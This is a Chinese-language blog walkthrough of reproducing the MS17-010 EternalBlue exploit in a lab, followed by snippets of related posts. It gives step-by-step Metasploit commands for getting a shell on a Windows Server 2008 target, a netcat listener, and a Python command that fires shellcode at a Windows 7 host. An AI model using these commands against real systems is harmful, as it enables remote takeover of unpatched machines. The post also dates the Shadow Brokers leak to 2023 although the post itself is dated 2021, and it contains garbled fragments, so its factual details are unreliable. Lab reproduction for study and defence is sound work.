MS17 010(永恆之藍)漏洞復現

2021-09-29 05:09:46 字數 895 閱讀 3484

永恆之藍是2023年4月14日晚,黑客團體shadow brokers(影子經紀人)公布的一大批網路攻擊工具中的其中乙個。「永恆之藍」利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造「永恆之藍」製作了wannacry勒索病毒。

實驗一:獲取windows server 2008的shell

實驗環境:攻擊機:kali              靶機:windows server 2008

kali ip:192.168.3.129    win 2008 ip:192.168.3.128

root@kali:~# msfconsole 

[-] ***rting the metasploit framework console.../

...msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set processname lsass.exe

processname => lsass.exe

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.3.129

lhost => 192.168.3.129

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.3.128

rhost => 192.168.3.128

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

永恆之藍ms17 010復現

使用工具 metasploit 一 環境準備 kali虛擬機器 二 metasploit簡介 metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和it專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智慧型開發 審計 web應...

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...